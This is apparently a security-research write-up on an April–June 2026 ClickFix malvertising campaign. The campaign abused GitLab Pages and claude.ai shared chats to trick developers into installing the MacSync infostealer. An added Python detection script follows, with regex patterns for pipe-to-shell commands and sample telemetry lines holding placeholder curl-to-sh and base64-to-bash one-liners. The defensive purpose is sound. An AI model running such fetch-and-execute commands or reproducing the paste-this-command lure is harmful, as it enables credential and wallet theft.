Attackers Weaponize claude.ai Shared Chat for ClickFix Malvertising Campaign

TrendAI Research tracked a sustained malvertising campaign from April to June 2026 that used Google Ads to deliver ClickFix social engineering attacks impersonating popular AI developer tools. The campaign operated across six distinct attack waves, deploying 106 unique malicious hostnames across GitLab Pages before shifting to abuse claude.ai's legitimate shared chat feature. The Asia-Pacific region accounted for 67.4% of all confirmed victims, with Taiwan representing 30.5% of total traffic.

The attackers created over 92 malicious GitLab Pages subdomains mimicking legitimate software downloads, rapidly rotating infrastructure to evade detection. In May, the campaign pivoted to claude.ai's share feature, creating at least 45 unique shared conversation IDs that hosted fake Apple Support or Corda Team chat pages with instructions to paste terminal commands. Victims were tricked into executing curl commands piped through base64 decode that fetched and executed the MacSync infostealer, which harvests browser credentials, SSH keys, and cryptocurrency wallet files.

The malware checked for Russian keyboard layouts and terminated if detected, suggesting regional targeting restrictions. Upon notification, Anthropic banned the responsible accounts, disabled malicious shared conversations, and implemented additional abuse mitigations. Researchers recommend organizations educate developers about ClickFix attacks, monitor for unexpected terminal commands following web browsing, and deploy endpoint detection for the identified payload hashes. Users should navigate directly to official product websites rather than clicking search ads for software downloads, avoid copying commands from web pages, and use official package managers for installing developer tools. The campaign represents a concerning new vector where threat actors weaponize trusted AI platform features as social engineering delivery mechanisms.
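One way to act on the monitoring recommendation above (watch for unexpected terminal commands that follow web browsing, and for the curl-piped-through-base64-decode pattern the campaign used) is a small correlation rule over endpoint telemetry. The script below is an added example written for this page, not code from TrendAI Research or from the article; the `timestamp|type|detail` telemetry format, the sample lines, and the 120-second browsing window are constructed assumptions, and the share-conversation ID and hostnames in the sample are placeholders, not real indicators from the campaign.

```python
"""Flag ClickFix-style shell one-liners and correlate them with recent browsing.

Added example, not part of the original article. Event format and field names
are assumptions made for this demonstration.
"""
import re
from datetime import datetime, timedelta

# Named indicators so each alert explains what matched: a fetch tool, a base64
# decode step, and a pipe (or eval/subshell) into a shell interpreter.
INDICATORS = {
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "base64_decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "eval_or_source": re.compile(r"\b(eval|source)\b|\$\((curl|wget)"),
}

# Assumed window: a suspicious command this soon after a page visit is
# treated as likely copied from that page.
BROWSING_WINDOW = timedelta(seconds=120)


def classify_command(cmd: str) -> list[str]:
    """Return the names of every indicator present in a shell command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def is_clickfix_like(cmd: str) -> bool:
    """True when a command both fetches/decodes content and hands it to a shell.

    A bare 'curl -O file' downloads but does not execute, so it is not flagged;
    'curl ... | sh' and 'echo <blob> | base64 -d | bash' are.
    """
    hits = set(classify_command(cmd))
    executes = bool(hits & {"pipe_to_shell", "eval_or_source"})
    fetches_or_decodes = bool(hits & {"downloader", "base64_decode"})
    return executes and fetches_or_decodes


def parse_event(line: str) -> dict:
    """Parse one constructed 'timestamp|type|detail' telemetry line.

    maxsplit=2 keeps any '|' characters inside the command itself.
    """
    ts, kind, detail = line.split("|", 2)
    return {"ts": datetime.fromisoformat(ts), "kind": kind, "detail": detail}


def scan_events(lines: list[str]) -> list[dict]:
    """Return one alert per ClickFix-like shell command.

    Severity is 'high' when the command ran within BROWSING_WINDOW of the most
    recent browser visit (and that URL is attached), otherwise 'medium'.
    """
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["ts"])
    alerts = []
    last_browse = None
    for ev in events:
        if ev["kind"] == "browser":
            last_browse = ev
        elif ev["kind"] == "shell" and is_clickfix_like(ev["detail"]):
            recent = last_browse is not None and ev["ts"] - last_browse["ts"] <= BROWSING_WINDOW
            alerts.append({
                "ts": ev["ts"].isoformat(),
                "command": ev["detail"],
                "indicators": classify_command(ev["detail"]),
                "after_browsing": last_browse["detail"] if recent else None,
                "severity": "high" if recent else "medium",
            })
    return alerts


# Constructed sample telemetry: the share URL, base64 blob and hostnames are
# placeholders, not indicators from the real campaign.
SAMPLE_TELEMETRY = [
    "2026-05-12T09:14:02|browser|https://claude.ai/share/EXAMPLE-CONVERSATION-ID",
    "2026-05-12T09:14:40|shell|echo 'PLACEHOLDER_BASE64_BLOB' | base64 -d | bash",
    "2026-05-12T09:30:00|shell|brew install node",
    "2026-05-12T11:02:10|shell|curl -fsSL http://example.invalid/setup.sh | sh",
    "2026-05-12T11:05:00|browser|https://docs.example.invalid/",
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_TELEMETRY):
        print(alert["severity"], alert["ts"], alert["indicators"], alert["after_browsing"])
```

In a real deployment the browser events would come from browser history or a proxy log and the shell events from a process-execution sensor keyed on the same host and user; the rule itself stays the same. The `medium` tier is deliberate: a `curl | sh` with no preceding browsing is still worth a look (developer tooling installs use the same idiom), but the page-then-paste sequence is what distinguishes ClickFix.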
